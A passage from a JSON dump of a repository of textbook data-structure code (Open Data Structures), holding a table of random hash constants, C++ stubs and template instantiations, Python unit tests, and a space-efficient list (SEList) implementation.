0x883ca306,\r\n\t0xf66aecac,\r\n\t0x979bf015,\r\n\t0x8e85e27d,\r\n\t0x0560372b,\r\n\t0x987995d6,\r\n\t0xaff98ed7,\r\n\t0x552ee87b,\r\n\t0x21a53787,\r\n\t0x3d3cfd45,\r\n\t0xa084dae0,\r\n\t0x8c91be2f,\r\n\t0xac4c3550,\r\n\t0xa7db63ff,\r\n\t0x124b2f23,\r\n\t0x95d05d4e,\r\n\t0xb983db13,\r\n\t0xa929a3c1,\r\n\t0x111cd0a0,\r\n\t0xf59ded9a,\r\n\t0xce677ae3,\r\n\t0xfa949e59,\r\n\t0xd673e658,\r\n\t0xf8c8e27b,\r\n\t0x3c60fc3d,\r\n\t0x59a4f230,\r\n\t0xf54a5e87,\r\n\t0x08cff440,\r\n\t0xd4bbb1ee,\r\n\t0x6a0c7db0,\r\n\t0xecbaa99d,\r\n\t0xec61dcaf,\r\n\t0xf1056e2b,\r\n\t0x54236899,\r\n\t0xadad347c,\r\n\t0xc9885bc9,\r\n\t0x2fe2a4ec,\r\n\t0x01ba2b86,\r\n\t0x6b23f604,\r\n\t0xb354ef08,\r\n\t0x6a3dc5e2,\r\n\t0xab61da36,\r\n\t0x7543925a,\r\n\t0x0a558940,\r\n\t0x48d4d8f3,\r\n\t0xd84f2f6f,\r\n\t0x6ac5311c,\r\n\t0xcd1b660e,\r\n\t0x51293d3d,\r\n\t0xa0f15790,\r\n\t0xd629cd78,\r\n\t0x89201fa5,\r\n\t0x46005119,\r\n\t0x9617fa14,\r\n\t0xc375a68b,\r\n\t0x7ccb519b,\r\n\t0x6420a714,\r\n\t0xb736d2ce,\r\n\t0x154fcf4a,\r\n\t0x71cad2f5,\r\n\t0xacb150d7,\r\n\t0x97bc8e36,\r\n\t0xc5506d0a,\r\n\t0xa9facc35,\r\n\t0x1a9630db,\r\n\t0xbd3d72ee,\r\n\t0x58cdf27c,\r\n\t0x17f3e1f9,\r\n\t0x41598836,\r\n\t0xd6adac30,\r\n\t0x309a5b3f,\r\n\t0x3bd3aa32,\r\n\t0x40f08f50,\r\n\t0xf37cbd6c,\r\n\t0xcbdb8aef,\r\n\t0xe0819189,\r\n\t0x5a9b663b,\r\n\t0x6932a448,\r\n\t0xb1b3e866,\r\n\t0xc50ee24d,\r\n\t0xad999126,\r\n\t0xafb04056,\r\n\t0xc95974e5,\r\n\t0x636a64fa,\r\n\t0x0bb12dd9,\r\n\t0x78caa164,\r\n\t0xd26a7ec8,\r\n\t0x451a0b53,\r\n\t0x6d00aac6,\r\n\t0x484d1d9d,\r\n\t0x39728dd4,\r\n\t0xfbfec2ea,\r\n\t0xa6d5aaf9,\r\n\t0x91c4f6ea,\r\n\t0x31cab009,\r\n\t0x9b6ba4e8,\r\n\t0xe271ed67,\r\n\t0x4c87a84d,\r\n\t0x8a1a4567,\r\n\t0x93749497,\r\n\t0xc566edcc,\r\n\t0xc8229554,\r\n\t0x927925fd,\r\n\t0xad1caced,\r\n\t0xdc24f7ed,\r\n\t0xc92b9220,\r\n\t0x936cd037,\r\n\t0xbd2d0256,\r\n\t0x5c92409b,\r\n\t0xa3aa2682,\r\n\t0x4da97646,\r\n\t0xbcfdec81,\r\n\t0x25d5b61d,\r\n\t0x20e1660d,\r\n\t0x4b5214ed,\r\n\t0x91aa596a,\r\n\t0xb241415c,\r\n\t0x88ec91a1,\r\n\t0x2375e939,\r\n\t0x981ad627,\r\n\t0x4a54ee18,\r\n\t0x13d98660,\r\n\t0x9375c64d,\r\n\t0x538d3b28,\r\n\t0x4bf37ca7,\r\n\t0x192b351e,\r\n\t0x3cacf215,\r\n\t0x3ecf3565,\r\n\t0x50f5c0fc,\r\n\t0xaafe3d4e,\r\n\t0x6351b4f5,\r\n\t0x1b800d4f,\r\n\t0xfad73cdf,\r\n\t0xe300e1d8,\r\n\t0xb2cb5b04,\r\n\t0xfb019702,\r\n\t0xfb647f85,\r\n\t0x375a7b74,\r\n\t0xed6a6760,\r\n\t0x45c54e76,\r\n\t0x06524d79},\r\n\t{0x48722ec4,\r\n\t0x8a2694db,\r\n\t0x3cf80478,\r\n\t0xf9bc47ba,\r\n\t0x76b258fb,\r\n\t0xf71a1ec6,\r\n\t0x841189df,\r\n\t0x1a866461,\r\n\t0x72b5488c,\r\n\t0x71663983,\r\n\t0xbda59407,\r\n\t0xa2b68f85,\r\n\t0x62dbd0aa,\r\n\t0xe4966aa3,\r\n\t0x32e0efaa,\r\n\t0x71bb3699,\r\n\t0x2eda14a6,\r\n\t0x53f8917c,\r\n\t0x874974ce,\r\n\t0xe680bcca,\r\n\t0x96a9c462,\r\n\t0x399ca451,\r\n\t0xc46616f5,\r\n\t0xeee71114,\r\n\t0x5878e472,\r\n\t0x3a83c559,\r\n\t0x54862a18,\r\n\t0x82aea480,\r\n\t0x492d0019,\r\n\t0xd62a7027,\r\n\t0x36655f50,\r\n\t0xce412fdf,\r\n\t0xc8136871,\r\n\t0xd6cfe1d8,\r\n\t0x121c9c91,\r\n\t0x13abbf51,\r\n\t0x3aaa7037,\r\n\t0x9f6e7cb6,\r\n\t0xae82c4c4,\r\n\t0x55fdce32,\r\n\t0xd8dd6bda,\r\n\t0xd6ec4938,\r\n\t0x6a5aee52,\r\n\t0x52c8a764,\r\n\t0xa6a85297,\r\n\t0x5131de9e,\r\n\t0x396a6599,\r\n\t0xe27b1100,\r\n\t0xe68588d3,\r\n\t0x7b89a612,\r\n\t0xad48a7a4,\r\n\t0xfd205673,\r\n\t0x81807089,\r\n\t0x239d2d38,\r\n\t0x39518df3,\r\n\t0x256f3f14,\r\n\t0x5c65e7b8,\r\n\t0x64caebdc,\r\n\t0xd8d694b6,\r\n\t0xb4a87da3,\r\n\t0xa651881e,\r\n\t0xca1d252d,\r\n\t0x993a3ddc,\r\n\t0x14f9a54d,\r\n\t0x6b14d2ff,\r\n\t0xbbed03bb,\r\n\t0x8d12bc03,\r\n\t0x6cce455d,\r\n\t0x613d6487,\r\n\t0x6d04ce6a,\r\n\t0xc2f4c84c,\r\n\t0x306d8ff2,\r\n\t0x584a9847,\r\n\t0x68902fc5,\r\n\t0x70af1a4f,\r\n\t0x3ab4cb98,\r\n\t0xe8be4453,\r\n\t0x7e95d355,\r\n\t0x84b0f371,\r\n\t0x4c5ccb52,\r\n\t0xdd6d029c,\r\n\t0xafa47124,\r\n\t0x71aabf91,\r\n\t0xd3407f95,\r\n\t0xe7fa3a9c,\r\n\t0x4f634405,\r\n\t0x0cbf2cb7,\r\n\t0x0192ff17,\r\n\t0x296959dd,\r\n\t0x9e4d34d5,\r\n\t0xfd9a4286,\r\n\t0xac7b6933,\r\n\t0x4650f585,\r\n\t0x168af40d,\r\n\t0x73816119,\r\n\t0x5542d96d,\r\n\t0x99047276,\r\n\t0x1b5bbe67,\r\n\t0x01a8209e,\r\n\t0x6f9db32e,\r\n\t0xd762bbd1,\r\n\t0x299a3804,\r\n\t0x87abe66d,\r\n\t0xd479eeaa,\r\n\t0x79928f4e,\r\n\t0x3937ffbc,\r\n\t0x3c8e83ca,\r\n\t0x2a8f9347,\r\n\t0x4d2324d3,\r\n\t0xf0183dda,\r\n\t0x9fbedb15,\r\n\t0xac365889,\r\n\t0xf1be552c,\r\n\t0xa4b32d5a,\r\n\t0xdc77fff3,\r\n\t0x9d516da8,\r\n\t0x7f3c347c,\r\n\t0x39e8479f,\r\n\t0x9e869687,\r\n\t0x6a160347,\r\n\t0x49ab7403,\r\n\t0x830d31c7,\r\n\t0x11311354,\r\n\t0x79e6cc69,\r\n\t0x35b25caa,\r\n\t0x398af9aa,\r\n\t0x02ef4356,\r\n\t0xb5ecba53,\r\n\t0x666d6c8b,\r\n\t0x8836b3ae,\r\n\t0x23b9fc98,\r\n\t0x0cc8e3d0,\r\n\t0x3ad594e1,\r\n\t0xb124529d,\r\n\t0xe059c1de,\r\n\t0xfa88e0d9,\r\n\t0xba117846,\r\n\t0x1782a65a,\r\n\t0xee9f80f9,\r\n\t0xbc9aec55,\r\n\t0x88aec1d4,\r\n\t0x9c3907fa,\r\n\t0x92b7b5bf,\r\n\t0x464acbf4,\r\n\t0xbbbd04a8,\r\n\t0xf0e966bf,\r\n\t0x14c5f971,\r\n\t0x83018d49,\r\n\t0xfaf4fc0a,\r\n\t0x3b4639b2,\r\n\t0x6b7e297d,\r\n\t0xc0e9a807,\r\n\t0x418713d3,\r\n\t0x1a2b2361,\r\n\t0x80850d90,\r\n\t0xd515816e,\r\n\t0x3deb48ea,\r\n\t0x6bfe6aa1,\r\n\t0x3680036c,\r\n\t0x228e76ae,\r\n\t0x78f16c87,\r\n\t0xff4d85ea,\r\n\t0x7d831974,\r\n\t0xba962d6b,\r\n\t0x4bae0b1d,\r\n\t0xc0db431a,\r\n\t0x04b46400,\r\n\t0xcf427175,\r\n\t0x244e321d,\r\n\t0x1c8b1fc9,\r\n\t0x63a2b794,\r\n\t0x1939d9c6,\r\n\t0xc92a530e,\r\n\t0x21a8e5ad,\r\n\t0x28050194,\r\n\t0x3b106223,\r\n\t0xb21e2ce1,\r\n\t0x7ae71fe4,\r\n\t0x7f7759f0,\r\n\t0x0329c8f4,\r\n\t0xd09f6b37,\r\n\t0x897e12a5,\r\n\t0x4103c4b1,\r\n\t0x56520dae,\r\n\t0x5d7391aa,\r\n\t0x7ac9f12d,\r\n\t0xeac6b834,\r\n\t0x99f8f6a8,\r\n\t0x2867867a,\r\n\t0xff6f3343,\r\n\t0x3167097a,\r\n\t0x38432d1d,\r\n\t0x108377f8,\r\n\t0xfd8e0d5f,\r\n\t0x25e15692,\r\n\t0xf00d40f9,\r\n\t0x1f1276f3,\r\n\t0xb748c8cd,\r\n\t0x6dbb9d9c,\r\n\t0x99ab7ceb,\r\n\t0xa4a9784f,\r\n\t0xcb4b2535,\r\n\t0xb3eb5ca7,\r\n\t0xd3a09e75,\r\n\t0x90f3ee7e,\r\n\t0x28ef2a57,\r\n\t0xbdb643a2,\r\n\t0x1112ab10,\r\n\t0x546b1af2,\r\n\t0x8c41e90d,\r\n\t0x0f5fcd88,\r\n\t0x6f259f40,\r\n\t0x34b33966,\r\n\t0x5f3558d7,\r\n\t0xfff36f0b,\r\n\t0xa3459449,\r\n\t0xdcecbce1,\r\n\t0x69ff2bf7,\r\n\t0x7525e1da,\r\n\t0x24c9de72,\r\n\t0xea9626b1,\r\n\t0x87c7385d,\r\n\t0x15e4211e,\r\n\t0x9f7ef269,\r\n\t0xfed018d1,\r\n\t0x7632076c,\r\n\t0x8d4f0157,\r\n\t0x10c1205a,\r\n\t0x65db0e00,\r\n\t0x813f0e8b,\r\n\t0xbafea255,\r\n\t0xb47e6663,\r\n\t0x2a0eba78,\r\n\t0xf66b3783,\r\n\t0xfff1db48,\r\n\t0x47997f03,\r\n\t0x3a49e877,\r\n\t0x4536a0b5,\r\n\t0x89b0738f,\r\n\t0xf5758b5e,\r\n\t0x1d277388,\r\n\t0xf5db28e8,\r\n\t0xb4ef0add,\r\n\t0x776fed12,\r\n\t0x045b614a,\r\n\t0xc95f47ae,\r\n\t0x13a1d602,\r\n\t0x217d6338,\r\n\t0xc509d080,\r\n\t0x006789de,\r\n\t0xd891cccc,\r\n\t0xb02f9980,\r\n\t0x67f00301,\r\n\t0xafc87999,\r\n\t0x043d8fbd,\r\n\t0xb32d6061}};\r\n\r\n\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5493826866149902,
"avg_line_length": 10.461538314819336,
"blob_id": "5aa9a6e74918651a221123a69f5c9a2508a0e40c",
"content_id": "23344d4bd050fe769310fb2c779693a94d8ed330",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 162,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 13,
"path": "/opendatastructures.org/cpp/ScapegoatTree.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * ScapegoatTree.cpp\r\n *\r\n * Created on: 2011-11-30\r\n * Author: morin\r\n */\r\n\r\n#include \"ScapegoatTree.h\"\r\n\r\nnamespace ods {\r\n\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.7142857313156128,
"alphanum_fraction": 0.7142857313156128,
"avg_line_length": 16.33333396911621,
"blob_id": "56434ea9e35f79dfddb51b0c79166bd512461f6b",
"content_id": "6e220cfb533dcaa0efaa84a6ceec0dac4f9962de",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 112,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 6,
"path": "/opendatastructures.org/python/ods/tests/test_adjacencylists.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "\r\n\r\nimport ods\r\nfrom graphtest import exercise_graph\r\n\r\n\r\ndef test_al():\r\n exercise_graph(ods.AdjacencyLists)"
},
{
"alpha_fraction": 0.7168141603469849,
"alphanum_fraction": 0.7168141603469849,
"avg_line_length": 16.5,
"blob_id": "666ea1911a89635e3460790cf26f9ac7e70cb770",
"content_id": "14b41eed2482ba5a9ad01eb5c4ef47278b8481cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 113,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 6,
"path": "/opendatastructures.org/python/ods/tests/test_adjacencymatrix.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "\r\n\r\nimport ods\r\nfrom graphtest import exercise_graph\r\n\r\n\r\ndef test_am():\r\n exercise_graph(ods.AdjacencyMatrix)"
},
{
"alpha_fraction": 0.34309622645378113,
"alphanum_fraction": 0.3828451931476593,
"avg_line_length": 22.789474487304688,
"blob_id": "56053ef9e6149fc9fef5d05ed257cc44faf204be",
"content_id": "619131272f2673e95d60dbe19b566e66574c2aaf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 956,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 38,
"path": "/opendatastructures.org/python/ods/tests/settest.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "\r\nimport random\r\n\r\ndef set_cmp(s1, s2):\r\n \"\"\"Compare s1 and s2 several different ways\"\"\"\r\n assert(len(s1) == len(s2))\r\n assert(sorted(s1) == sorted(s2))\r\n for x in s1:\r\n assert(x in s2)\r\n for x in s2:\r\n assert(x in s1)\r\n \r\ndef exercise_set(s):\r\n s1 = s\r\n s2 = set()\r\n \r\n n = 100\r\n for j in range(5):\r\n if j == 2:\r\n s1.clear()\r\n s2.clear()\r\n for _ in range(n):\r\n x = random.randrange(2*n)\r\n s1.add(x)\r\n s2.add(x)\r\n set_cmp(s1, s2)\r\n \r\n for i in range(2*n):\r\n assert((i in s1) == (i in s2))\r\n \r\n for i in range(n):\r\n x = random.randrange(2*n)\r\n if x in s2:\r\n s1.remove(x)\r\n s2.remove(x)\r\n set_cmp(s1, s2)\r\n \r\n for i in range(2*n):\r\n assert((i in s1) == (i in s2))\r\n \r\n\r\n"
},
{
"alpha_fraction": 0.5498154759407043,
"alphanum_fraction": 0.553505539894104,
"avg_line_length": 13.05555534362793,
"blob_id": "7fb55acb19b936232886e0b1a87aefbc85d7c680",
"content_id": "9ab9300a41ad4385b01d30ab2c7f62ff2de31e45",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 271,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 18,
"path": "/opendatastructures.org/cpp/Simple.h",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/** Fake file used for providing a code snippet */\r\n\r\nnamespace ods {\r\n\r\ntemplate<class T>\r\nclass Simple {\r\n\tint *a;\r\n\tint n;\r\n\tvoid snippet();\r\n}\r\n\r\ntemplate<class T>\r\nvoid Simple<T>::snippet() {\r\n\tfor (int i = 0; i < n; i++) \r\n\t\ta[i] = i;\r\n}\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.713178277015686,
"alphanum_fraction": 0.713178277015686,
"avg_line_length": 19.5,
"blob_id": "e1704e6b6863b4471d538003de30ae1a6b15e3fa",
"content_id": "972012dcec8d32e4599b6b9443dd0309545213e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 129,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 6,
"path": "/opendatastructures.org/python/ods/tests/test_xfasttrie.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "from nose.tools import *\r\nimport ods\r\nfrom ssettest import exercise_sset\r\n\r\ndef test_bst():\r\n exercise_sset(ods.XFastTrie())\r\n"
},
{
"alpha_fraction": 0.4740259647369385,
"alphanum_fraction": 0.5259740352630615,
"avg_line_length": 9.84615421295166,
"blob_id": "4b3efcefa9576878f57349b5d6f022a8f135dfef",
"content_id": "c0f2d4445c724a9b46310b1c1430b9c759951ce0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 154,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 13,
"path": "/opendatastructures.org/cpp/YFastTrie.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * YFastTrie.cpp\r\n *\r\n * Created on: 2012-01-27\r\n * Author: morin\r\n */\r\n\r\n#include \"YFastTrie.h\"\r\n\r\nnamespace ods {\r\n\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.6717557311058044,
"alphanum_fraction": 0.6870229244232178,
"avg_line_length": 19.83333396911621,
"blob_id": "84c1990519459541cea32b66f86ae40ac54fc2bb",
"content_id": "8803ff1138decfbf8f50db9aec325497da93ac80",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 524,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 24,
"path": "/opendatastructures.org/cpp/DualArrayDeque.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * DualArrayDeque.cpp\r\n *\r\n * Created on: 2011-11-23\r\n * Author: morin\r\n */\r\n\r\n#include \"DualArrayDeque.h\"\r\n#include \"utils.h\"\r\n\r\nnamespace ods {\r\n\r\n\r\ntemplate DualArrayDeque<int>::DualArrayDeque();\r\ntemplate DualArrayDeque<int>::~DualArrayDeque();\r\ntemplate int DualArrayDeque<int>::get(int);\r\ntemplate int DualArrayDeque<int>::set(int,int);\r\ntemplate void DualArrayDeque<int>::add(int,int);\r\ntemplate int DualArrayDeque<int>::remove(int);\r\ntemplate int DualArrayDeque<int>::size();\r\n\r\n\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.6499999761581421,
"alphanum_fraction": 0.6727272868156433,
"avg_line_length": 19.399999618530273,
"blob_id": "0a98731a67b780386cce39287d4574af1252af51",
"content_id": "2a0a9ef1d7eabe6f5274adf73dda59b8e28b2d4e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 220,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 10,
"path": "/opendatastructures.org/python/ods/tests/test_selist.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "import random\r\nfrom nose.tools import *\r\n\r\nimport ods\r\nfrom listtest import exercise_list\r\n\r\ndef test_sel():\r\n exercise_list(ods.SEList(5))\r\n exercise_list(ods.SEList(10))\r\n exercise_list(ods.SEList(42))\r\n \r\n"
},
{
"alpha_fraction": 0.7028985619544983,
"alphanum_fraction": 0.7028985619544983,
"avg_line_length": 17.428571701049805,
"blob_id": "1ba8dd4ae95c86197a673d67864f47a385fc981c",
"content_id": "8ab03d2293519c04055ea573dddd12ce20371154",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 138,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 7,
"path": "/opendatastructures.org/python/ods/tests/test_skiplistsset.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "\r\nfrom nose.tools import *\r\n\r\nimport ods\r\nfrom ssettest import exercise_sset\r\n\r\ndef test_treap():\r\n exercise_sset(ods.SkiplistSSet())\r\n"
},
{
"alpha_fraction": 0.39790576696395874,
"alphanum_fraction": 0.46073299646377563,
"avg_line_length": 36.20000076293945,
"blob_id": "7a1e0264de6ef15512245df21eb1f5b88f3d072a",
"content_id": "0928e32b16672f24a0ab04a8184f5243fb51cf96",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 573,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 15,
"path": "/opendatastructures.org/python/ods/geomvector.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "\"\"\"Demonstration code used to illustrate hashing a variable length object\"\"\"\r\nclass GeomVector(object):\r\n def hash_code(self):\r\n p = (1<<32)-5 # this is a prime number\r\n z = 0x64b6055a # 32 bits from random.org\r\n z2 = 0x5067d19d # random odd 32 bit number\r\n s = 0\r\n zi = 1\r\n for i in range(len(x)):\r\n # reduce to 31 bits\r\n xi = ((x[i].hash_code() * z2)%(1<<32)) >> 1 \r\n s = (s + zi * xi) % p\r\n zi = (zi * z) % p \r\n s = (s + zi * (p-1)) % p\r\n return s%(1<<32)\r\n"
},
{
"alpha_fraction": 0.5693780183792114,
"alphanum_fraction": 0.6076555252075195,
"avg_line_length": 11.933333396911621,
"blob_id": "5b5b6a56a0e346f690be49b7cefa92ee4cf4811b",
"content_id": "a1dff15fdbbd0018ffc4cc6314374156eb945389",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 209,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 15,
"path": "/opendatastructures.org/cpp/ChainedHashTable.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * ChainedHashTable.cpp\r\n *\r\n * Created on: 2011-11-30\r\n * Author: morin\r\n */\r\n\r\n#include \"ChainedHashTable.h\"\r\n\r\nnamespace ods {\r\n\r\n\r\ntemplate class ChainedHashTable<int>;\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.663551390171051,
"alphanum_fraction": 0.6869158744812012,
"avg_line_length": 30.923076629638672,
"blob_id": "b3c93fd721c6bfddfe31417df954fb464765c455",
"content_id": "eea7a470dce35400e49758adf06c9672b315a068",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 428,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 13,
"path": "/opendatastructures.org/python/ods/tests/test_algorithms.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "import random\r\n\r\nfrom sorttest import exercise_sort\r\nfrom ods import merge_sort, quick_sort, counting_sort, radix_sort, heap_sort\r\n\r\ndef test_sorts():\r\n exercise_sort(merge_sort)\r\n exercise_sort(quick_sort)\r\n exercise_sort(heap_sort)\r\n k = 100\r\n exercise_sort(lambda a: counting_sort(a, k), lambda : random.randrange(k))\r\n r = 1000000\r\n exercise_sort(lambda a: radix_sort(a), lambda : random.randrange(r))\r\n"
},
{
"alpha_fraction": 0.6835442781448364,
"alphanum_fraction": 0.6835442781448364,
"avg_line_length": 14.88888931274414,
"blob_id": "a3149a6130b0dc0c238ae601331ba307defbaac9",
"content_id": "13c4d3ccb48a7aca195c283058a88277139d9957",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 158,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 9,
"path": "/opendatastructures.org/python/ods/tests/test_dualrraydeque.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "import random\r\n\r\nfrom nose.tools import *\r\n\r\nimport ods\r\nfrom listtest import exercise_list\r\n\r\ndef test_as():\r\n exercise_list(ods.DualArrayDeque())\r\n \r\n"
},
{
"alpha_fraction": 0.42860469222068787,
"alphanum_fraction": 0.4346610903739929,
"avg_line_length": 26.403972625732422,
"blob_id": "c208f3939abcda610cade017708ed0aa2bddde09",
"content_id": "fe1d4d4fe34eb7242a25b7d63ecce613948b2773",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4293,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 151,
"path": "/opendatastructures.org/python/ods/selist.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "\r\nfrom utils import new_array\r\nfrom base import BaseList\r\nfrom arraydeque import ArrayDeque\r\n\r\nclass SEList(BaseList):\r\n class BDeque(ArrayDeque):\r\n \"\"\"A bounded-size deque\"\"\"\r\n def __init__(self, b):\r\n super(SEList.BDeque, self).__init__()\r\n self.a = new_array(b+1)\r\n \r\n def _resize(self):\r\n pass\r\n \r\n class Node(object):\r\n def __init__(self, b):\r\n self.d = SEList.BDeque(b)\r\n self.prev = None\r\n self.next = None\r\n \r\n def __init__(self, b):\r\n super(SEList, self).__init__()\r\n self.b = b\r\n self._initialize()\r\n \r\n def _new_node(self):\r\n return SEList.Node(self.b)\r\n \r\n def _initialize(self):\r\n self.dummy = self._new_node()\r\n self.dummy.next = self.dummy.prev = self.dummy\r\n self.n = 0\r\n \r\n def _add_before(self, w):\r\n \"\"\"Create a new node and add it before w\"\"\"\r\n u = self._new_node()\r\n u.prev = w.prev\r\n u.next = w\r\n u.next.prev = u\r\n u.prev.next = u\r\n return u\r\n \r\n def _remove_node(self, w):\r\n w.prev.next = w.next\r\n w.next.prev = w.prev\r\n \r\n def _get_location(self, i):\r\n if i < self.n//2:\r\n u = self.dummy.next\r\n while i >= u.d.size():\r\n i -= u.d.size()\r\n u = u.next\r\n return u,i\r\n else:\r\n u = self.dummy\r\n idx = self.n\r\n while i < idx:\r\n u = u.prev\r\n idx -= u.d.size()\r\n return u, i-idx\r\n \r\n def get(self, i):\r\n u, j = self._get_location(i)\r\n return u.d.get(j)\r\n\r\n def set(self, i, x):\r\n u, j = self._get_location(i)\r\n return u.d.set(j, x)\r\n\r\n def _spread(self, u):\r\n w = u\r\n for j in range(self.b):\r\n w = w.next\r\n w = self._add_before(w)\r\n while w is not u:\r\n while w.d.size() < self.b:\r\n w.d.add_first(w.prev.d.remove_last())\r\n w = w.prev\r\n \r\n def _gather(self, u):\r\n w = u\r\n for j in range(self.b-1):\r\n while w.d.size() < self.b:\r\n w.d.add_last(w.next.d.remove_first())\r\n w = w.next\r\n self._remove_node(w)\r\n \r\n \r\n def add(self, i, x):\r\n if i < 0 or i > self.n: raise IndexError()\r\n if i == self.n:\r\n self.append(x)\r\n return\r\n u, j = self._get_location(i)\r\n r = 0\r\n w = u\r\n while r < self.b and w is not self.dummy and w.d.size() == self.b+1:\r\n w = w.next\r\n r += 1\r\n if r == self.b: # b blocks, each with b+1 elements\r\n self._spread(u)\r\n w = u\r\n if w == self.dummy: # ran off the end - add new node\r\n w = self._add_before(w)\r\n while w is not u: # work backwards, shifting elements as we go\r\n w.d.add_first(w.prev.d.remove_last())\r\n w = w.prev\r\n w.d.add(j, x)\r\n self.n += 1\r\n\r\n def append(self, x):\r\n last = self.dummy.prev\r\n if last is self.dummy or last.d.size() == self.b+1:\r\n last = self._add_before(self.dummy)\r\n last.d.append(x)\r\n self.n += 1\r\n \r\n def remove(self, i):\r\n if i < 0 or i > self.n-1: raise IndexError()\r\n u, j = self._get_location(i)\r\n y = u.d.get(j)\r\n w = u\r\n r = 0\r\n while r < self.b and w is not self.dummy and w.d.size() == self.b-1:\r\n w = w.next\r\n r += 1\r\n if r == self.b: # b blocks, each with b-1 elements\r\n self._gather(u)\r\n u.d.remove(j)\r\n while u.d.size() < self.b-1 and u.next is not self.dummy:\r\n u.d.add_last(u.next.d.remove_first())\r\n u = u.next\r\n if u.d.size() == 0: self._remove_node(u)\r\n self.n -= 1\r\n\r\n def clear(self):\r\n self._initialize()\r\n \r\n def __iter__(self):\r\n u = self.dummy.next\r\n while u is not self.dummy:\r\n for x in u.d:\r\n yield x\r\n u = u.next\r\n\r\nif __name__ == \"__main__\":\r\n ell = SEList(6)\r\n print ell\r\n ell.append(20)\r\n ell.append(21)\r\n print ell \r\n"
},
{
"alpha_fraction": 0.5595238208770752,
"alphanum_fraction": 0.5595238208770752,
"avg_line_length": 7.333333492279053,
"blob_id": "8984b0ee19118b6621bca48f78ae188b75fb54a5",
"content_id": "92cb2b99db83ab3dda01e1c27f20d9b361c24b31",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 84,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 9,
"path": "/opendatastructures.org/cpp/utils.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "#include \"utils.h\"\r\n\r\nnamespace ods {\r\n\r\nint hashCode(int x) {\r\n\treturn x;\r\n}\r\n\r\n}\r\n"
},
{
"alpha_fraction": 0.4784810245037079,
"alphanum_fraction": 0.5139240622520447,
"avg_line_length": 32.09090805053711,
"blob_id": "ac412cbf39efc717f3d97419b2a6699dd45b7010",
"content_id": "19bd59dd16cfb4db842d18ff870c71b259ec22ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 395,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 11,
"path": "/opendatastructures.org/python/ods/tests/sorttest.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
